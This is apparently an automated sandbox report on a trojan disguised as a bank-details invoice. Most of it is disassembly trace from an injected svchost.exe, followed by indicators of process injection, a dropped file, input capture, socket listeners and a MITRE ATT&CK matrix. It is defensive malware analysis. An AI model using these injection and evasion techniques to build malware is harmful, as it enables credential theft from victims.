                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A197 mov eax, dword ptr fs:[00000030h]3_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A197 mov eax, dword ptr fs:[00000030h]3_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A197 mov eax, dword ptr fs:[00000030h]3_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365C073 mov eax, dword ptr fs:[00000030h]3_2_0365C073
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03632050 mov eax, dword ptr fs:[00000030h]3_2_03632050
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B6050 mov eax, dword ptr fs:[00000030h]3_2_036B6050
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A020 mov eax, dword ptr fs:[00000030h]3_2_0362A020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362C020 mov eax, dword ptr fs:[00000030h]3_2_0362C020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C6030 mov eax, dword ptr fs:[00000030h]3_2_036C6030
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B4000 mov ecx, dword ptr fs:[00000030h]3_2_036B4000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E016 mov eax, dword ptr fs:[00000030h]3_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E016 mov eax, dword ptr fs:[00000030h]3_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E016 mov eax, dword ptr fs:[00000030h]3_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E016 mov eax, dword ptr fs:[00000030h]3_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0362A0E3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036380E9 mov eax, dword ptr fs:[00000030h]3_2_036380E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B60E0 mov eax, dword ptr fs:[00000030h]3_2_036B60E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362C0F0 mov eax, dword ptr fs:[00000030h]3_2_0362C0F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036720F0 mov ecx, dword ptr fs:[00000030h]3_2_036720F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B20DE mov eax, dword ptr fs:[00000030h]3_2_036B20DE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036280A0 mov eax, dword ptr fs:[00000030h]3_2_036280A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C80A8 mov eax, dword ptr fs:[00000030h]3_2_036C80A8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F60B8 mov eax, dword ptr fs:[00000030h]3_2_036F60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F60B8 mov ecx, dword ptr fs:[00000030h]3_2_036F60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363208A mov eax, dword ptr fs:[00000030h]3_2_0363208A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03638770 mov eax, dword ptr fs:[00000030h]3_2_03638770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366674D mov esi, dword ptr fs:[00000030h]3_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366674D mov eax, dword ptr fs:[00000030h]3_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366674D mov eax, dword ptr fs:[00000030h]3_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03630750 mov eax, dword ptr fs:[00000030h]3_2_03630750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036BE75D mov eax, dword ptr fs:[00000030h]3_2_036BE75D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672750 mov eax, dword ptr fs:[00000030h]3_2_03672750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672750 mov eax, dword ptr fs:[00000030h]3_2_03672750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B4755 mov eax, dword ptr fs:[00000030h]3_2_036B4755
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366C720 mov eax, dword ptr fs:[00000030h]3_2_0366C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366C720 mov eax, dword ptr fs:[00000030h]3_2_0366C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366273C mov eax, dword ptr fs:[00000030h]3_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366273C mov ecx, dword ptr fs:[00000030h]3_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366273C mov eax, dword ptr fs:[00000030h]3_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AC730 mov eax, dword ptr fs:[00000030h]3_2_036AC730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366C700 mov eax, dword ptr fs:[00000030h]3_2_0366C700
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03630710 mov eax, dword ptr fs:[00000030h]3_2_03630710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03660710 mov eax, dword ptr fs:[00000030h]3_2_03660710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036527ED mov eax, dword ptr fs:[00000030h]3_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036527ED mov eax, dword ptr fs:[00000030h]3_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036527ED mov eax, dword ptr fs:[00000030h]3_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036BE7E1 mov eax, dword ptr fs:[00000030h]3_2_036BE7E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036347FB mov eax, dword ptr fs:[00000030h]3_2_036347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036347FB mov eax, dword ptr fs:[00000030h]3_2_036347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363C7C0 mov eax, dword ptr fs:[00000030h]3_2_0363C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B07C3 mov eax, dword ptr fs:[00000030h]3_2_036B07C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036307AF mov eax, dword ptr fs:[00000030h]3_2_036307AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E47A0 mov eax, dword ptr fs:[00000030h]3_2_036E47A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D678E mov eax, dword ptr fs:[00000030h]3_2_036D678E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F866E mov eax, dword ptr fs:[00000030h]3_2_036F866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F866E mov eax, dword ptr fs:[00000030h]3_2_036F866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A660 mov eax, dword ptr fs:[00000030h]3_2_0366A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A660 mov eax, dword ptr fs:[00000030h]3_2_0366A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03662674 mov eax, dword ptr fs:[00000030h]3_2_03662674
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364C640 mov eax, dword ptr fs:[00000030h]3_2_0364C640
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E627 mov eax, dword ptr fs:[00000030h]3_2_0364E627
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03666620 mov eax, dword ptr fs:[00000030h]3_2_03666620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03668620 mov eax, dword ptr fs:[00000030h]3_2_03668620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363262C mov eax, dword ptr fs:[00000030h]3_2_0363262C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE609 mov eax, dword ptr fs:[00000030h]3_2_036AE609
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672619 mov eax, dword ptr fs:[00000030h]3_2_03672619
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE6F2 mov eax, dword ptr fs:[00000030h]3_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE6F2 mov eax, dword ptr fs:[00000030h]3_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE6F2 mov eax, dword ptr fs:[00000030h]3_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE6F2 mov eax, dword ptr fs:[00000030h]3_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B06F1 mov eax, dword ptr fs:[00000030h]3_2_036B06F1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B06F1 mov eax, dword ptr fs:[00000030h]3_2_036B06F1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0366A6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A6C7 mov eax, dword ptr fs:[00000030h]3_2_0366A6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366C6A6 mov eax, dword ptr fs:[00000030h]3_2_0366C6A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036666B0 mov eax, dword ptr fs:[00000030h]3_2_036666B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634690 mov eax, dword ptr fs:[00000030h]3_2_03634690
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634690 mov eax, dword ptr fs:[00000030h]3_2_03634690
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366656A mov eax, dword ptr fs:[00000030h]3_2_0366656A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366656A mov eax, dword ptr fs:[00000030h]3_2_0366656A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366656A mov eax, dword ptr fs:[00000030h]3_2_0366656A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03638550 mov eax, dword ptr fs:[00000030h]3_2_03638550
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03638550 mov eax, dword ptr fs:[00000030h]3_2_03638550
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640535 mov eax, dword ptr fs:[00000030h]3_2_03640535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640535 mov eax, dword ptr fs:[00000030h]3_2_03640535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640535 mov eax, dword ptr fs:[00000030h]3_2_03640535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640535 mov eax, dword ptr fs:[00000030h]3_2_03640535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640535 mov eax, dword ptr fs:[00000030h]3_2_03640535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640535 mov eax, dword ptr fs:[00000030h]3_2_03640535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E53E mov eax, dword ptr fs:[00000030h]3_2_0365E53E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E53E mov eax, dword ptr fs:[00000030h]3_2_0365E53E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E53E mov eax, dword ptr fs:[00000030h]3_2_0365E53E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E53E mov eax, dword ptr fs:[00000030h]3_2_0365E53E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E53E mov eax, dword ptr fs:[00000030h]3_2_0365E53E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C6500 mov eax, dword ptr fs:[00000030h]3_2_036C6500
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704500 mov eax, dword ptr fs:[00000030h]3_2_03704500
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704500 mov eax, dword ptr fs:[00000030h]3_2_03704500
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704500 mov eax, dword ptr fs:[00000030h]3_2_03704500
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704500 mov eax, dword ptr fs:[00000030h]3_2_03704500
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704500 mov eax, dword ptr fs:[00000030h]3_2_03704500
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704500 mov eax, dword ptr fs:[00000030h]3_2_03704500
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704500 mov eax, dword ptr fs:[00000030h]3_2_03704500
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E5E7 mov eax, dword ptr fs:[00000030h]3_2_0365E5E7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E5E7 mov eax, dword ptr fs:[00000030h]3_2_0365E5E7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E5E7 mov eax, dword ptr fs:[00000030h]3_2_0365E5E7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E5E7 mov eax, dword ptr fs:[00000030h]3_2_0365E5E7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365E5E7 mov eax, dword ptr fs:[00000030h]3_2_0365E5E7
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_004AA66C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_00498189 SetUnhandledExceptionFilter | 0_2_00498189
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_004981AC
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: 2_2_00D48189 SetUnhandledExceptionFilter | 2_2_00D48189
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: 2_2_00D481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_00D481AC

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: AB4008
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3302008
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004AB106 LogonUserW | 0_2_004AB106
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_00473D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 0_2_00473D19
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004B411C SendInput,keybd_event | 0_2_004B411C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004B74E7 mouse_event | 0_2_004B74E7
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_004AA66C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004B71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 0_2_004B71FA
                  Source: confirm bank details invoice.exe, deblaterate.exe | Binary or memory string: Shell_TrayWnd
                  Source: confirm bank details invoice.exe, deblaterate.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004965C4 cpuid | 0_2_004965C4
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004C091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW | 0_2_004C091D
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004EB340 GetUserNameW | 0_2_004EB340
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004A1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 0_2_004A1E8E
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_0048DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_0048DDC0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: deblaterate.exe | Binary or memory string: WIN_81
                  Source: deblaterate.exe | Binary or memory string: WIN_XP
                  Source: deblaterate.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                  Source: deblaterate.exe | Binary or memory string: WIN_XPe
                  Source: deblaterate.exe | Binary or memory string: WIN_VISTA
                  Source: deblaterate.exe | Binary or memory string: WIN_7
                  Source: deblaterate.exe | Binary or memory string: WIN_8

                  Remote Access Functionality

                  Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004C8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket | 0_2_004C8C4F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe | Code function: 0_2_004C923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 0_2_004C923B
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: 2_2_00D78C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket | 2_2_00D78C4F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe | Code function: 2_2_00D7923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 2_2_00D7923B
                  MITRE ATT&CK Matrix (a leading number is the report's hit count for that technique)

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 3 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | Steganography | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 116 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 1 Masquerading | LSA Secrets | 25 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  Submitted file
                  Source | Detection | Scanner | Label | Link
                  confirm bank details invoice.exe | 34% | ReversingLabs | Win32.Trojan.AutoitInject |
                  confirm bank details invoice.exe | 100% | Joe Sandbox ML | |

                  Dropped files
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Vevina\deblaterate.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Vevina\deblaterate.exe | 34% | ReversingLabs | Win32.Trojan.AutoitInject |

                  No Antivirus matches
                  No contacted domains info
                  No contacted IP infos
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1560108
                  Start date and time:2024-11-21 12:18:09 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
